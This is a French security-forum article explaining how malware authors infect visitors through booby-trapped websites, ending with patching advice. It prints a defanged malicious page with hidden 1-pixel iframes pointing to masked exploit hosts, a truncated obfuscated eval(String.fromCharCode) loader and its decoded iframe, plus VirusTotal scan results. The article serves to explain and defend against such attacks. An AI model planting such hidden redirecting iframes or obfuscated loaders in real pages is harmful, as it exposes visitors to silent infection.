Les antivirus étant maintenant capables de protéger les internautes efficacement contre les vers par mails, les internautes étant de plus en plus avertis par cette méthode de propagation, les auteurs de malwares utilisent de plus en plus les exploits sur les sites WEB pour infecter les internautes (voir la news Sophos : ftopic3329.php)
Ces sites permettant l'installation d'une infection de manière automatique et à l'insu de l'utilisateur, vous trouverez un exemple sur l'article Attention aux sites de cracks!
Nous allons voir le principe des infections via des exploits sur des sites WEB.
NOTE : La connaissance de certaines notions et expressions est nécessaire pour appréhender cet article... Reportez-vous au Glossaire : Notions et Expressions pour suivre cet article.
La théorie
Pour infecter votre ordinateur, l'auteur du malware doit réussir à exécuter sur votre ordinateur le fichier à l'origine de l'infection sans que les logiciels de protections ne le détectent/interceptent.
Une fois l'infection installée, votre antivirus peut détecter certains fichiers composant l'infection mais en règle générale, ce dernier n'arrive pas à détecter la totalité ou supprimer l'infection en entier surtout quand l'infection est composée de rootkits
La première difficulté pour installer une infection est donc de faire exécuter le fichier à l'origine de l'infection sur le système ciblé.
C'est à ce moment précis que les exploits vont être utilisés.
En visitant une page Web piégée, celle-ci va exploiter une faille de sécurité de votre navigateur WEB afin de télécharger et exécuter à votre insu le fichier à l'origine de l'infection.
Pour se faire, les auteurs des malwares vont créer une multitude (des centaines) de sites WEB piégés, si possible sur des thèmes suceptibles d'amener un maximum de personnes, donc par exemple des sites de cracks ou pornographiques. Ces sites WEB contiennent alors une iframe de 1 pixel de large pointant vers un ou plusieurs sites WEB contenant les exploits et le fichier à l'origine de l'infection.
L'iframe étant un cadre contenant une page html qui va être automatiquement exécutée par le navigateur, la taille de 1 pixel permet de cacher celle-ci de l'internaute au moment de consulter la page WEB.
L'iframe va alors rediriger l'internaute à son insu sur le site contenant l'exploit puis permettre le téléchargement et l'exécution du fichier à l'origine de l'infection au sein du système.
Voici un résumé via un schéma (cliquez sur l'image pour l'agrandir) :
Lors de la visite de la page piégée, votre antivirus peut alors détecter l'exploit, généralement Exploit.ADODB.Stream.xxx ou JS/Psyme.xxx
En pratique :
Voici un exemple de code d'une page WEB piégée. Toutes les adresses ont été masquées.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><base target="_blank">
<head>
<meta http-equiv="content-type" content="text/htxml;charset=iso-8859-1">
<title>xxxxxx xxxx</title>
<SxCRIPT language=JavaScript>
<!--
document.cookie = 'trafman=traf-0.805.1181008106.1.0.805.; path=/;;';
// -->
</SCRIPT>
</head>
<body bgcolor="#464646" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0" bottommargin="0">
<scrxipt type='text/javascript'>eval(String.fromCxharCode(100,111,99,117,120,101,110,116,46,120,114,105,116,101,40,39,60,105,12,114........,114,97,109,101,62,39,41)
</xscript>
<iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>
En rouge nous pouvons visualiser l'iframe qui permet une redirection vers l'adresse en src=
Les attributs width="1" height="1" donne une taille de 1 pixel sur 1 pixel à l'iframe.
Celle-ci est donc invisible pour l'utilisateur.
En bleu, nous avons un script offusqué. Ce dernier nous donne :
- Code: Tout sélectionner
document.write('<iframe style="display:none" src="http://xx.xxx.xxx.xx/data/title.html" width=0 height=0></iframe>')
Encore une iframe de taille 0 qui renvoie vers un site.
Le fichier title.html de la première iframe en bleu contient :
- Code: Tout sélectionner
<HTMx>
<HEAD>
</HEAD>
<BODY>
<iframx src="http://xx.xxx.xxx.xx/data/do_z.html" width="1" height="1"><iframe src="http://xx.xxx.xxx.xx/data/if_z.html" width="1" height="1"></iframe><iframe src="nie_z.html" width="1" height="1"></iframe>
</BODY>
</HTML>
enfin un scan des fichiers do_z.html & if_z.html nous donne :
Complete scanning result of "do_z.html", received in VirusTotal at 06.03.2007, 10:17:22 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.3
Authentium 4.93.8 05.23.2007 JS/Psyme.CA@dl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Psyme.CA@dl
F-Secure 6.70.13030.0 06.02.2007 JS/Psyme.CA@dl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.3
Aditional Information
File size: 3405 bytes
MD5: 18d6ee8bea0e60a073486af1aac08e06
SHA1: 0b66f4915e66a9adc0f275648283ed7a9789831b
Complete scanning result of "if_z.html", received in VirusTotal at 06.03.2007, 10:17:27 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.4
Authentium 4.93.8 05.23.2007 JS/Mht.BB@expl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Mht.BB@expl
F-Secure 6.70.13030.0 06.02.2007 JS/Mht.BB@expl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.4
Aditional Information
File size: 2321 bytes
MD5: 9b5e23a1f45a9b3a1e9bfa32c4d4a51e
SHA1: a2e181ed072a0e0aae6cf832d1b8bd6c56859756
Ce sont donc deux exploits qui vont permettre le téléchargement et l'execution fichiers à l'origine de l'infection à l'insu de l'internaute.
Pour résumer : le site WEB piégé contient deux iframes invisibles à l'utilisateur. Au moment de consulter la page, le navigateur va se connecter au site WEB contenu dans les iframes et ceci de manière automatique.
La première iframe va lancer deux exploits sur le navigateur WEB qui vont exploiter une faille de sécurité sur le navigateur afin de permettre le téléchargement et l'execution des fichiers à l'origine de l'infection à l'insu de l'internaute.
En Conclusion :
Les auteurs de malwares vont créer des centaines de sites piégés afin de permettre l'installation d'infections sur les ordinateurs des internautes.
Un simple programme permet aux auteurs de malwares de mettre à jour leurs centaines de sites pour faire pointer vers de nouveaux exploits qui vont exploiter les dernières failles de sécurité ou tout simplement lorsque le fichier à l'origine de l'infection est trop bien détecté par les antivirus.
Pour ne pas vous faire infecter par ces exploits, maintenez votre système à jour, bannissez les versions obselètes des navigateurs WEB et utilisez un navigateur alternatif que vous sécurisez, (voir Sécuriser son ordinateur version courte)
Pour aller plus loin :
Je vous conseille vivement de jeter un coup d'oeil à cet exellent papier de Honeynet.org sur les serveurs WEB malicieux : ftopic4921.php et Pourquoi et comment je me fais infecter?
Plus globalement, vous pouvez lire la page Sécuriser son ordinateur et connaître les menaces qui vous liste les moyens de propagation et menaces sur internet et vous donne des conseils pour sécuriser votre ordinateur.
Voici aussi un lien de Sophos (en anglais) qui explique les mécanismes des exploits via sites WEB : http://www.sophos.com/security/blog/2007/06/157.html
